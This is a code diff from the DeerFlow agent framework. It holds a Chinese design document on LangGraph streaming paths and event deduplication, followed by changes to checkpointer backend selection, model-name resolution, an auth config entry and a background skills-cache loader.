- 两条路径都从 `create_agent()` 工厂出发,核心都是订阅 LangGraph 的 `stream_mode=["values", "messages", "custom"]`。`values` 是节点级 state 快照,`messages` 是 LLM token 级 delta,`custom` 是显式 `StreamWriter` 事件。**这三种模式不是详细程度的梯度,是三个独立的事件源**,要 token 流就必须显式订阅 `messages`。
|
||||
- 嵌入式 client 为每个 `stream()` 调用维护三个 `set[str]`:`seen_ids` / `streamed_ids` / `counted_usage_ids`。三者看起来相似但管理**三个独立的不变式**,不能合并。
|
||||
|
||||
---
|
||||
|
||||
## 为什么有两条流式路径
|
||||
|
||||
两条路径服务的消费者模型根本不同:
|
||||
|
||||
| 维度 | Gateway 路径 | DeerFlowClient 路径 |
|
||||
|---|---|---|
|
||||
| 入口 | FastAPI `/runs/stream` endpoint | `DeerFlowClient.stream(message)` |
|
||||
| 触发层 | `runtime/runs/worker.py::run_agent` | `packages/harness/deerflow/client.py::DeerFlowClient.stream` |
|
||||
| 执行模型 | `async def` + `agent.astream()` | sync generator + `agent.stream()` |
|
||||
| 事件传输 | `StreamBridge`(asyncio Queue)+ `sse_consumer` | 直接 `yield` |
|
||||
| 序列化 | `serialize(chunk)` → 纯 JSON dict,匹配 LangGraph Platform wire 格式 | `StreamEvent.data`,携带原生 LangChain 对象 |
|
||||
| 消费者 | 前端 `useStream` React hook、飞书/Slack/Telegram channel、LangGraph SDK 客户端 | Jupyter notebook、集成测试、内部 Python 脚本 |
|
||||
| 生命周期管理 | `RunManager`:run_id 跟踪、disconnect 语义、multitask 策略、heartbeat | 无;函数返回即结束 |
|
||||
| 断连恢复 | `Last-Event-ID` SSE 重连 | 无需要 |
|
||||
|
||||
**两条路径的存在是 DRY 的刻意妥协**:Gateway 的全部基础设施(async + Queue + JSON + RunManager)**都是为了跨网络边界把事件送给 HTTP 消费者**。当生产者(agent)和消费者(Python 调用栈)在同一个进程时,这整套东西都是纯开销。
|
||||
|
||||
### 为什么不能让 DeerFlowClient 复用 Gateway
|
||||
|
||||
曾经考虑过三种复用方案,都被否决:
|
||||
|
||||
1. **让 `client.stream()` 变成 `async def client.astream()`**
|
||||
breaking change。用户用不上的 `async for` / `asyncio.run()` 要硬塞进 Jupyter notebook 和同步脚本。DeerFlowClient 的一大卖点("把 agent 当普通函数调用")直接消失。
|
||||
|
||||
2. **在 `client.stream()` 内部起一个独立事件循环线程,用 `StreamBridge` 在 sync/async 之间做桥接**
|
||||
引入线程池、队列、信号量。为了"消除重复",把**复杂度**代替代码行数引进来。是典型的"wrong abstraction"——开销高于复用收益。
|
||||
|
||||
3. **让 `run_agent` 自己兼容 sync mode**
|
||||
给 Gateway 加一条用不到的死分支,污染 worker.py 的焦点。
|
||||
|
||||
所以两条路径的事件处理逻辑会**相似但不共享**。这是刻意设计,不是疏忽。
|
||||
|
||||
---
|
||||
|
||||
## LangGraph `stream_mode` 三层语义
|
||||
|
||||
LangGraph 的 `agent.stream(stream_mode=[...])` 是**多路复用**接口:一次订阅多个 mode,每个 mode 是一个独立的事件源。三种核心 mode:
|
||||
|
||||
```mermaid
|
||||
flowchart LR
|
||||
classDef values fill:#B8C5D1,stroke:#5A6B7A,color:#2C3E50
|
||||
classDef messages fill:#C9B8A8,stroke:#7A6B5A,color:#2C3E50
|
||||
classDef custom fill:#B5C4B1,stroke:#5A7A5A,color:#2C3E50
|
||||
|
||||
subgraph LG["LangGraph agent graph"]
|
||||
direction TB
|
||||
Node1["node: LLM call"]
|
||||
Node2["node: tool call"]
|
||||
Node3["node: reducer"]
|
||||
end
|
||||
|
||||
LG -->|"每个节点完成后"| V["values: 完整 state 快照"]
|
||||
Node1 -->|"LLM 每产生一个 token"| M["messages: (AIMessageChunk, meta)"]
|
||||
Node1 -->|"StreamWriter.write()"| C["custom: 任意 dict"]
|
||||
|
||||
class V values
|
||||
class M messages
|
||||
class C custom
|
||||
```
|
||||
|
||||
| Mode | 发射时机 | Payload | 粒度 |
|
||||
|---|---|---|---|
|
||||
| `values` | 每个 graph 节点完成后 | 完整 state dict(title、messages、artifacts)| 节点级 |
|
||||
| `messages` | LLM 每次 yield 一个 chunk;tool 节点完成时 | `(AIMessageChunk \| ToolMessage, metadata_dict)` | token 级 |
|
||||
| `custom` | 用户代码显式调用 `StreamWriter.write()` | 任意 dict | 应用定义 |
|
||||
|
||||
### 两套命名的由来
|
||||
|
||||
同一件事在**三个协议层**有三个名字:
|
||||
|
||||
```
|
||||
Application HTTP / SSE LangGraph Graph
|
||||
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
|
||||
│ frontend │ │ LangGraph │ │ agent.astream│
|
||||
│ useStream │──"messages- │ Platform SDK │──"messages"──│ graph.astream│
|
||||
│ Feishu IM │ tuple"──────│ HTTP wire │ │ │
|
||||
└──────────────┘ └──────────────┘ └──────────────┘
|
||||
```
|
||||
|
||||
- **Graph 层**(`agent.stream` / `agent.astream`):LangGraph Python 直接 API,mode 叫 **`"messages"`**。
|
||||
- **Platform SDK 层**(`langgraph-sdk` HTTP client):跨进程 HTTP 契约,mode 叫 **`"messages-tuple"`**。
|
||||
- **Gateway worker** 显式做翻译:`if m == "messages-tuple": lg_modes.append("messages")`(`runtime/runs/worker.py:117-121`)。
|
||||
|
||||
**后果**:`DeerFlowClient.stream()` 直接调 `agent.stream()`(Graph 层),所以必须传 `"messages"`。`app/channels/manager.py` 通过 `langgraph-sdk` 走 HTTP SDK,所以传 `"messages-tuple"`。**这两个字符串不能互相替代**,也不能抽成"一个共享常量"——它们是不同协议层的 type alias,共享只会让某一层说不是它母语的话。
|
||||
|
||||
---
|
||||
|
||||
## Gateway 路径:async + HTTP SSE
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant Client as HTTP Client
|
||||
participant API as FastAPI<br/>thread_runs.py
|
||||
participant Svc as services.py<br/>start_run
|
||||
participant Worker as worker.py<br/>run_agent (async)
|
||||
participant Bridge as StreamBridge<br/>(asyncio.Queue)
|
||||
participant Agent as LangGraph<br/>agent.astream
|
||||
participant SSE as sse_consumer
|
||||
|
||||
Client->>API: POST /runs/stream
|
||||
API->>Svc: start_run(body)
|
||||
Svc->>Bridge: create bridge
|
||||
Svc->>Worker: asyncio.create_task(run_agent(...))
|
||||
Svc-->>API: StreamingResponse(sse_consumer)
|
||||
API-->>Client: event-stream opens
|
||||
|
||||
par worker (producer)
|
||||
Worker->>Agent: astream(stream_mode=lg_modes)
|
||||
loop 每个 chunk
|
||||
Agent-->>Worker: (mode, chunk)
|
||||
Worker->>Bridge: publish(run_id, event, serialize(chunk))
|
||||
end
|
||||
Worker->>Bridge: publish_end(run_id)
|
||||
and sse_consumer (consumer)
|
||||
SSE->>Bridge: subscribe(run_id)
|
||||
loop 每个 event
|
||||
Bridge-->>SSE: StreamEvent
|
||||
SSE-->>Client: "event: <name>\ndata: <json>\n\n"
|
||||
end
|
||||
end
|
||||
```
|
||||
|
||||
关键组件:
|
||||
|
||||
- `runtime/runs/worker.py::run_agent` — 在 `asyncio.Task` 里跑 `agent.astream()`,把每个 chunk 通过 `serialize(chunk, mode=mode)` 转成 JSON,再 `bridge.publish()`。
|
||||
- `runtime/stream_bridge` — 抽象 Queue。`publish/subscribe` 解耦生产者和消费者,支持 `Last-Event-ID` 重连、心跳、多订阅者 fan-out。
|
||||
- `app/gateway/services.py::sse_consumer` — 从 bridge 订阅,格式化为 SSE wire 帧。
|
||||
- `runtime/serialization.py::serialize` — mode-aware 序列化;`messages` mode 下 `serialize_messages_tuple` 把 `(chunk, metadata)` 转成 `[chunk.model_dump(), metadata]`。
|
||||
|
||||
**`StreamBridge` 的存在价值**:当生产者(`run_agent` 任务)和消费者(HTTP 连接)在不同的 asyncio task 里运行时,需要一个可以跨 task 传递事件的中介。Queue 同时还承担断连重连的 buffer 和多订阅者的 fan-out。
|
||||
|
||||
---
|
||||
|
||||
## DeerFlowClient 路径:sync + in-process
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant User as Python caller
|
||||
participant Client as DeerFlowClient.stream
|
||||
participant Agent as LangGraph<br/>agent.stream (sync)
|
||||
|
||||
User->>Client: for event in client.stream("hi"):
|
||||
Client->>Agent: stream(stream_mode=["values","messages","custom"])
|
||||
loop 每个 chunk
|
||||
Agent-->>Client: (mode, chunk)
|
||||
Client->>Client: 分发 mode<br/>构建 StreamEvent
|
||||
Client-->>User: yield StreamEvent
|
||||
end
|
||||
Client-->>User: yield StreamEvent(type="end")
|
||||
```
|
||||
|
||||
对比之下,sync 路径的每个环节都是显著更少的移动部件:
|
||||
|
||||
- 没有 `RunManager` —— 一次 `stream()` 调用对应一次生命周期,无需 run_id。
|
||||
- 没有 `StreamBridge` —— 直接 `yield`,生产和消费在同一个 Python 调用栈,不需要跨 task 中介。
|
||||
- 没有 JSON 序列化 —— `StreamEvent.data` 直接装原生 LangChain 对象(`AIMessage.content`、`usage_metadata` 的 `UsageMetadata` TypedDict)。Jupyter 用户拿到的是真正的类型,不是匿名 dict。
|
||||
- 没有 asyncio —— 调用者可以直接 `for event in ...`,不必写 `async for`。
|
||||
|
||||
---
|
||||
|
||||
## 消费语义:delta vs cumulative
|
||||
|
||||
LangGraph `messages` mode 给出的是 **delta**:每个 `AIMessageChunk.content` 只包含这一次新 yield 的 token,**不是**从头的累计文本。
|
||||
|
||||
这个语义和 LangChain 的 `fs2 Stream` 风格一致:**上游发增量,下游负责累加**。Gateway 路径里前端 `useStream` React hook 自己维护累加器;DeerFlowClient 路径里 `chat()` 方法替调用者做累加。
|
||||
|
||||
### `DeerFlowClient.chat()` 的 O(n) 累加器
|
||||
|
||||
```python
|
||||
chunks: dict[str, list[str]] = {}
|
||||
last_id: str = ""
|
||||
for event in self.stream(message, thread_id=thread_id, **kwargs):
|
||||
if event.type == "messages-tuple" and event.data.get("type") == "ai":
|
||||
msg_id = event.data.get("id") or ""
|
||||
delta = event.data.get("content", "")
|
||||
if delta:
|
||||
chunks.setdefault(msg_id, []).append(delta)
|
||||
last_id = msg_id
|
||||
return "".join(chunks.get(last_id, ()))
|
||||
```
|
||||
|
||||
**为什么不是 `buffers[id] = buffers.get(id,"") + delta`**:CPython 的字符串 in-place concat 优化仅在 refcount=1 且 LHS 是 local name 时生效;这里字符串存在 dict 里被 reassign,优化失效,每次都是 O(n) 拷贝 → 总体 O(n²)。实测 50 KB / 5000 chunk 的回复要 100-300ms 纯拷贝开销。用 `list` + `"".join()` 是 O(n)。
|
||||
|
||||
---
|
||||
|
||||
## 三个 id set 为什么不能合并
|
||||
|
||||
`DeerFlowClient.stream()` 在一次调用生命周期内维护三个 `set[str]`:
|
||||
|
||||
```python
|
||||
seen_ids: set[str] = set() # values 路径内部 dedup
|
||||
streamed_ids: set[str] = set() # messages → values 跨模式 dedup
|
||||
counted_usage_ids: set[str] = set() # usage_metadata 幂等计数
|
||||
```
|
||||
|
||||
乍看像是"三份几乎一样的东西",实际每个管**不同的不变式**。
|
||||
|
||||
| Set | 负责的不变式 | 被谁填充 | 被谁查询 |
|
||||
|---|---|---|---|
|
||||
| `seen_ids` | 连续两个 `values` 快照里同一条 message 只生成一个 `messages-tuple` 事件 | values 分支每处理一条消息就加入 | values 分支处理下一条消息前检查 |
|
||||
| `streamed_ids` | 如果一条消息已经通过 `messages` 模式 token 级流过,values 快照到达时**不要**再合成一次完整 `messages-tuple` | messages 分支每发一个 AI/tool 事件就加入 | values 分支看到消息时检查 |
|
||||
| `counted_usage_ids` | 同一个 `usage_metadata` 在 messages 末尾 chunk 和 values 快照的 final AIMessage 里各带一份,**累计总量只算一次** | `_account_usage()` 每次接受 usage 就加入 | `_account_usage()` 每次调用时检查 |
|
||||
|
||||
### 为什么不能只用一个 set
|
||||
|
||||
关键观察:**同一个 message id 在这三个 set 里的加入时机不同**。
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant M as messages mode
|
||||
participant V as values mode
|
||||
participant SS as streamed_ids
|
||||
participant SU as counted_usage_ids
|
||||
participant SE as seen_ids
|
||||
|
||||
Note over M: 第一个 AI text chunk 到达
|
||||
M->>SS: add(msg_id)
|
||||
Note over M: 最后一个 chunk 带 usage
|
||||
M->>SU: add(msg_id)
|
||||
Note over V: snapshot 到达,包含同一条 AI message
|
||||
V->>SE: add(msg_id)
|
||||
V->>SS: 查询 → 已存在,跳过文本合成
|
||||
V->>SU: 查询 → 已存在,不重复计数
|
||||
```
|
||||
|
||||
- `seen_ids` **永远在 values 快照到达时**加入,所以它是 "values 已处理" 的标记。一条只出现在 messages 流里的消息(罕见但可能),`seen_ids` 里永远没有它。
|
||||
- `streamed_ids` **在 messages 流的第一个有效事件时**加入。一条只通过 values 快照到达的非 AI 消息(HumanMessage、被 truncate 的 tool 消息),`streamed_ids` 里永远没有它。
|
||||
- `counted_usage_ids` **只在看到非空 `usage_metadata` 时**加入。一条完全没有 usage 的消息(tool message、错误消息)永远不会进去。
|
||||
|
||||
**集合包含关系**:`counted_usage_ids ⊆ (streamed_ids ∪ seen_ids)` 大致成立,但**不是严格子集**,因为一条消息可以在 messages 模式流完 text 但**在最后那个带 usage 的 chunk 之前**就被 values snapshot 赶上——此时它已经在 `streamed_ids` 里,但还不在 `counted_usage_ids` 里。把它们合并成一个 dict-of-flags 会让这个微妙的时序依赖**从类型系统里消失**,变成注释里的一句话。三个独立的 set 把不变式显式化了:每个 set 名对应一个可以口头回答的问题。
|
||||
|
||||
---
|
||||
|
||||
## 端到端:一次真实对话的事件时序
|
||||
|
||||
假设调用 `client.stream("Count from 1 to 15")`,LLM 给出 "one\ntwo\n...\nfifteen"(88 字符),tokenizer 把它拆成 ~35 个 BPE chunk。下面是事件到达序列的精简版:
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant C as DeerFlowClient
|
||||
participant A as LangGraph<br/>agent.stream
|
||||
|
||||
U->>C: stream("Count ... 15")
|
||||
C->>A: stream(mode=["values","messages","custom"])
|
||||
|
||||
A-->>C: ("values", {messages: [HumanMessage]})
|
||||
C-->>U: StreamEvent(type="values", ...)
|
||||
|
||||
Note over A,C: LLM 开始 yield token
|
||||
loop 35 次,约 476ms
|
||||
A-->>C: ("messages", (AIMessageChunk(content="ele"), meta))
|
||||
C->>C: streamed_ids.add(ai-1)
|
||||
C-->>U: StreamEvent(type="messages-tuple",<br/>data={type:ai, content:"ele", id:ai-1})
|
||||
end
|
||||
|
||||
Note over A: LLM finish_reason=stop,最后一个 chunk 带 usage
|
||||
A-->>C: ("messages", (AIMessageChunk(content="", usage_metadata={...}), meta))
|
||||
C->>C: counted_usage_ids.add(ai-1)<br/>(无文本,不 yield)
|
||||
|
||||
A-->>C: ("values", {messages: [..., AIMessage(complete)]})
|
||||
C->>C: ai-1 in streamed_ids → 跳过合成
|
||||
C->>C: 捕获 usage (已在 counted_usage_ids,no-op)
|
||||
C-->>U: StreamEvent(type="values", ...)
|
||||
|
||||
C-->>U: StreamEvent(type="end", data={usage:{...}})
|
||||
```
|
||||
|
||||
关键观察:
|
||||
|
||||
1. 用户看到 **35 个 messages-tuple 事件**,跨越约 476ms,每个事件带一个 token delta 和同一个 `id=ai-1`。
|
||||
2. 最后一个 `values` 快照里的 `AIMessage` **不会**再触发一个完整的 `messages-tuple` 事件——因为 `ai-1 in streamed_ids` 跳过了合成。
|
||||
3. `end` 事件里的 `usage` 正好等于那一份 cumulative usage,**不是它的两倍**——`counted_usage_ids` 在 messages 末尾 chunk 上已经吸收了,values 分支的重复访问是 no-op。
|
||||
4. 消费者拿到的 `content` 是**增量**:"ele" 只包含 3 个字符,不是 "one\ntwo\n...ele"。想要完整文本要按 `id` 累加,`chat()` 已经帮你做了。
|
||||
|
||||
---
|
||||
|
||||
## 为什么这个设计容易出 bug,以及测试策略
|
||||
|
||||
本文档的直接起因是 bytedance/deer-flow#1969:`DeerFlowClient.stream()` 原本只订阅 `["values", "custom"]`,**漏了 `"messages"`**。结果 `client.stream("hello")` 等价于一次性返回,视觉上和 `chat()` 没区别。
|
||||
|
||||
这类 bug 有三个结构性原因:
|
||||
|
||||
1. **多协议层命名**:`messages` / `messages-tuple` / HTTP SSE `messages` 是同一概念的三个名字。在其中一层出错不会在另外两层报错。
|
||||
2. **多消费者模型**:Gateway 和 DeerFlowClient 是两套独立实现,**没有单一的"订阅哪些 mode"的 single source of truth**。前者订阅对了不代表后者也订阅对了。
|
||||
3. **mock 测试绕开了真实路径**:老测试用 `agent.stream.return_value = iter([dict_chunk, ...])` 喂 values 形状的 dict 模拟 state 快照。这样构造的输入**永远不会进入 `messages` mode 分支**,所以即使 `stream_mode` 里少一个元素,CI 依然全绿。
|
||||
|
||||
### 防御手段
|
||||
|
||||
真正的防线是**显式断言 "messages" mode 被订阅 + 用真实 chunk shape mock**:
|
||||
|
||||
```python
|
||||
# tests/test_client.py::test_messages_mode_emits_token_deltas
|
||||
agent.stream.return_value = iter([
|
||||
("messages", (AIMessageChunk(content="Hel", id="ai-1"), {})),
|
||||
("messages", (AIMessageChunk(content="lo ", id="ai-1"), {})),
|
||||
("messages", (AIMessageChunk(content="world!", id="ai-1"), {})),
|
||||
("values", {"messages": [HumanMessage(...), AIMessage(content="Hello world!", id="ai-1")]}),
|
||||
])
|
||||
# ...
|
||||
assert [e.data["content"] for e in ai_text_events] == ["Hel", "lo ", "world!"]
|
||||
assert len(ai_text_events) == 3 # values snapshot must NOT re-synthesize
|
||||
assert "messages" in agent.stream.call_args.kwargs["stream_mode"]
|
||||
```
|
||||
|
||||
**为什么这比"抽一个共享常量"更有效**:共享常量只能保证"用它的人写对字符串",但新增消费者的人可能根本不知道常量在哪。行为断言强制任何改动都要穿过**实际执行路径**,改回 `["values", "custom"]` 会立刻让 `assert "messages" in ...` 失败。
|
||||
|
||||
### 活体信号:BPE 子词边界
|
||||
|
||||
回归的最终验证是让真实 LLM 数 1-15,然后看是否能在输出里看到 tokenizer 的子词切分:
|
||||
|
||||
```
|
||||
[5.460s] 'ele' / 'ven' eleven 被拆成两个 token
|
||||
[5.508s] 'tw' / 'elve' twelve 拆两个
|
||||
[5.568s] 'th' / 'irteen' thirteen 拆两个
|
||||
[5.623s] 'four'/ 'teen' fourteen 拆两个
|
||||
[5.677s] 'f' / 'if' / 'teen' fifteen 拆三个
|
||||
```
|
||||
|
||||
子词切分是 tokenizer 的外部事实,**无法伪造**。能看到它就说明数据流**逐 chunk** 地穿过了整条管道,没有被任何中间层缓冲成整段。这种"活体信号"在流式系统里是比单元测试更高置信度的证据。
|
||||
|
||||
---
|
||||
|
||||
## 相关源码定位
|
||||
|
||||
| 关心什么 | 看这里 |
|
||||
|---|---|
|
||||
| DeerFlowClient 嵌入式流 | `packages/harness/deerflow/client.py::DeerFlowClient.stream` |
|
||||
| `chat()` 的 delta 累加器 | `packages/harness/deerflow/client.py::DeerFlowClient.chat` |
|
||||
| Gateway async 流 | `packages/harness/deerflow/runtime/runs/worker.py::run_agent` |
|
||||
| HTTP SSE 帧输出 | `app/gateway/services.py::sse_consumer` / `format_sse` |
|
||||
| 序列化到 wire 格式 | `packages/harness/deerflow/runtime/serialization.py` |
|
||||
| LangGraph mode 命名翻译 | `packages/harness/deerflow/runtime/runs/worker.py:117-121` |
|
||||
| 飞书渠道的增量卡片更新 | `app/channels/manager.py::_handle_streaming_chat` |
|
||||
| Channels 自带的 delta/cumulative 防御性累加 | `app/channels/manager.py::_merge_stream_text` |
|
||||
| Frontend useStream 支持的 mode 集合 | `frontend/src/core/api/stream-mode.ts` |
|
||||
| 核心回归测试 | `backend/tests/test_client.py::TestStream::test_messages_mode_emits_token_deltas` |
|
||||
@@ -8,6 +8,9 @@
|
||||
"graphs": {
|
||||
"lead_agent": "deerflow.agents:make_lead_agent"
|
||||
},
|
||||
"auth": {
|
||||
"path": "./app/gateway/langgraph_auth.py:auth"
|
||||
},
|
||||
"checkpointer": {
|
||||
"path": "./packages/harness/deerflow/agents/checkpointer/async_provider.py:make_checkpointer"
|
||||
}
|
||||
|
||||
@@ -2,8 +2,14 @@ from .checkpointer import get_checkpointer, make_checkpointer, reset_checkpointe
|
||||
from .factory import create_deerflow_agent
|
||||
from .features import Next, Prev, RuntimeFeatures
|
||||
from .lead_agent import make_lead_agent
|
||||
from .lead_agent.prompt import prime_enabled_skills_cache
|
||||
from .thread_state import SandboxState, ThreadState
|
||||
|
||||
# LangGraph imports deerflow.agents when registering the graph. Prime the
|
||||
# enabled-skills cache here so the request path can usually read a warm cache
|
||||
# without forcing synchronous filesystem work during prompt module import.
|
||||
prime_enabled_skills_cache()
|
||||
|
||||
__all__ = [
|
||||
"create_deerflow_agent",
|
||||
"RuntimeFeatures",
|
||||
|
||||
@@ -17,6 +17,7 @@ For sync usage see :mod:`deerflow.agents.checkpointer.provider`.
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import logging
|
||||
from collections.abc import AsyncIterator
|
||||
@@ -54,7 +55,7 @@ async def _async_checkpointer(config) -> AsyncIterator[Checkpointer]:
|
||||
raise ImportError(SQLITE_INSTALL) from exc
|
||||
|
||||
conn_str = resolve_sqlite_conn_str(config.connection_string or "store.db")
|
||||
ensure_sqlite_parent_dir(conn_str)
|
||||
await asyncio.to_thread(ensure_sqlite_parent_dir, conn_str)
|
||||
async with AsyncSqliteSaver.from_conn_string(conn_str) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
@@ -83,23 +84,76 @@ async def _async_checkpointer(config) -> AsyncIterator[Checkpointer]:
|
||||
|
||||
|
||||
@contextlib.asynccontextmanager
|
||||
async def make_checkpointer() -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that yields a checkpointer for the caller's lifetime.
|
||||
Resources are opened on enter and closed on exit — no global state::
|
||||
|
||||
async with make_checkpointer() as checkpointer:
|
||||
app.state.checkpointer = checkpointer
|
||||
|
||||
Yields an ``InMemorySaver`` when no checkpointer is configured in *config.yaml*.
|
||||
"""
|
||||
|
||||
config = get_app_config()
|
||||
|
||||
if config.checkpointer is None:
|
||||
async def _async_checkpointer_from_database(db_config) -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that constructs a checkpointer from unified DatabaseConfig."""
|
||||
if db_config.backend == "memory":
|
||||
from langgraph.checkpoint.memory import InMemorySaver
|
||||
|
||||
yield InMemorySaver()
|
||||
return
|
||||
|
||||
async with _async_checkpointer(config.checkpointer) as saver:
|
||||
yield saver
|
||||
if db_config.backend == "sqlite":
|
||||
try:
|
||||
from langgraph.checkpoint.sqlite.aio import AsyncSqliteSaver
|
||||
except ImportError as exc:
|
||||
raise ImportError(SQLITE_INSTALL) from exc
|
||||
|
||||
conn_str = db_config.checkpointer_sqlite_path
|
||||
ensure_sqlite_parent_dir(conn_str)
|
||||
async with AsyncSqliteSaver.from_conn_string(conn_str) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
return
|
||||
|
||||
if db_config.backend == "postgres":
|
||||
try:
|
||||
from langgraph.checkpoint.postgres.aio import AsyncPostgresSaver
|
||||
except ImportError as exc:
|
||||
raise ImportError(POSTGRES_INSTALL) from exc
|
||||
|
||||
if not db_config.postgres_url:
|
||||
raise ValueError("database.postgres_url is required for the postgres backend")
|
||||
|
||||
async with AsyncPostgresSaver.from_conn_string(db_config.postgres_url) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
return
|
||||
|
||||
raise ValueError(f"Unknown database backend: {db_config.backend!r}")
|
||||
|
||||
|
||||
@contextlib.asynccontextmanager
|
||||
async def make_checkpointer() -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that yields a checkpointer for the caller's lifetime.
|
||||
Resources are opened on enter and closed on exit -- no global state::
|
||||
|
||||
async with make_checkpointer() as checkpointer:
|
||||
app.state.checkpointer = checkpointer
|
||||
|
||||
Yields an ``InMemorySaver`` when no checkpointer is configured in *config.yaml*.
|
||||
|
||||
Priority:
|
||||
1. Legacy ``checkpointer:`` config section (backward compatible)
|
||||
2. Unified ``database:`` config section
|
||||
3. Default InMemorySaver
|
||||
"""
|
||||
|
||||
config = get_app_config()
|
||||
|
||||
# Legacy: standalone checkpointer config takes precedence
|
||||
if config.checkpointer is not None:
|
||||
async with _async_checkpointer(config.checkpointer) as saver:
|
||||
yield saver
|
||||
return
|
||||
|
||||
# Unified database config
|
||||
db_config = getattr(config, "database", None)
|
||||
if db_config is not None and db_config.backend != "memory":
|
||||
async with _async_checkpointer_from_database(db_config) as saver:
|
||||
yield saver
|
||||
return
|
||||
|
||||
# Default: in-memory
|
||||
from langgraph.checkpoint.memory import InMemorySaver
|
||||
|
||||
yield InMemorySaver()
|
||||
|
||||
@@ -56,13 +56,15 @@ def _create_summarization_middleware() -> SummarizationMiddleware | None:
|
||||
# Prepare keep parameter
|
||||
keep = config.keep.to_tuple()
|
||||
|
||||
# Prepare model parameter
|
||||
# Prepare model parameter.
|
||||
# Bind "middleware:summarize" tag so RunJournal identifies these LLM calls
|
||||
# as middleware rather than lead_agent (SummarizationMiddleware is a
|
||||
# LangChain built-in, so we tag the model at creation time).
|
||||
if config.model_name:
|
||||
model = create_chat_model(name=config.model_name, thinking_enabled=False)
|
||||
else:
|
||||
# Use a lightweight model for summarization to save costs
|
||||
# Falls back to default model if not explicitly specified
|
||||
model = create_chat_model(thinking_enabled=False)
|
||||
model = model.with_config(tags=["middleware:summarize"])
|
||||
|
||||
# Prepare kwargs
|
||||
kwargs = {
|
||||
@@ -287,14 +289,14 @@ def make_lead_agent(config: RunnableConfig):
|
||||
agent_name = cfg.get("agent_name")
|
||||
|
||||
agent_config = load_agent_config(agent_name) if not is_bootstrap else None
|
||||
# Custom agent model or fallback to global/default model resolution
|
||||
agent_model_name = agent_config.model if agent_config and agent_config.model else _resolve_model_name()
|
||||
# Custom agent model from agent config (if any), or None to let _resolve_model_name pick the default
|
||||
agent_model_name = agent_config.model if agent_config and agent_config.model else None
|
||||
|
||||
# Final model name resolution with request override, then agent config, then global default
|
||||
model_name = requested_model_name or agent_model_name
|
||||
# Final model name resolution: request → agent config → global default, with fallback for unknown names
|
||||
model_name = _resolve_model_name(requested_model_name or agent_model_name)
|
||||
|
||||
app_config = get_app_config()
|
||||
model_config = app_config.get_model_config(model_name) if model_name else None
|
||||
model_config = app_config.get_model_config(model_name)
|
||||
|
||||
if model_config is None:
|
||||
raise ValueError("No chat model could be resolved. Please configure at least one model in config.yaml or provide a valid 'model_name'/'model' in the request.")
|
||||
|
||||
@@ -1,20 +1,167 @@
|
||||
import asyncio
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime
|
||||
from functools import lru_cache
|
||||
|
||||
from deerflow.config.agents_config import load_agent_soul
|
||||
from deerflow.skills import load_skills
|
||||
from deerflow.skills.types import Skill
|
||||
from deerflow.subagents import get_available_subagent_names
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_ENABLED_SKILLS_REFRESH_WAIT_TIMEOUT_SECONDS = 5.0
|
||||
_enabled_skills_lock = threading.Lock()
|
||||
_enabled_skills_cache: list[Skill] | None = None
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_version = 0
|
||||
_enabled_skills_refresh_event = threading.Event()
|
||||
|
||||
|
||||
def _load_enabled_skills_sync() -> list[Skill]:
|
||||
return list(load_skills(enabled_only=True))
|
||||
|
||||
|
||||
def _start_enabled_skills_refresh_thread() -> None:
|
||||
threading.Thread(
|
||||
target=_refresh_enabled_skills_cache_worker,
|
||||
name="deerflow-enabled-skills-loader",
|
||||
daemon=True,
|
||||
).start()
|
||||
|
||||
|
||||
def _refresh_enabled_skills_cache_worker() -> None:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active
|
||||
|
||||
while True:
|
||||
with _enabled_skills_lock:
|
||||
target_version = _enabled_skills_refresh_version
|
||||
|
||||
try:
|
||||
skills = _load_enabled_skills_sync()
|
||||
except Exception:
|
||||
logger.exception("Failed to load enabled skills for prompt injection")
|
||||
skills = []
|
||||
|
||||
with _enabled_skills_lock:
|
||||
if _enabled_skills_refresh_version == target_version:
|
||||
_enabled_skills_cache = skills
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_event.set()
|
||||
return
|
||||
|
||||
# A newer invalidation happened while loading. Keep the worker alive
|
||||
# and loop again so the cache always converges on the latest version.
|
||||
_enabled_skills_cache = None
|
||||
|
||||
|
||||
def _ensure_enabled_skills_cache() -> threading.Event:
|
||||
global _enabled_skills_refresh_active
|
||||
|
||||
with _enabled_skills_lock:
|
||||
if _enabled_skills_cache is not None:
|
||||
_enabled_skills_refresh_event.set()
|
||||
return _enabled_skills_refresh_event
|
||||
if _enabled_skills_refresh_active:
|
||||
return _enabled_skills_refresh_event
|
||||
_enabled_skills_refresh_active = True
|
||||
_enabled_skills_refresh_event.clear()
|
||||
|
||||
_start_enabled_skills_refresh_thread()
|
||||
return _enabled_skills_refresh_event
|
||||
|
||||
|
||||
def _invalidate_enabled_skills_cache() -> threading.Event:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active, _enabled_skills_refresh_version
|
||||
|
||||
_get_cached_skills_prompt_section.cache_clear()
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = None
|
||||
_enabled_skills_refresh_version += 1
|
||||
_enabled_skills_refresh_event.clear()
|
||||
if _enabled_skills_refresh_active:
|
||||
return _enabled_skills_refresh_event
|
||||
_enabled_skills_refresh_active = True
|
||||
|
||||
_start_enabled_skills_refresh_thread()
|
||||
return _enabled_skills_refresh_event
|
||||
|
||||
|
||||
def prime_enabled_skills_cache() -> None:
|
||||
_ensure_enabled_skills_cache()
|
||||
|
||||
|
||||
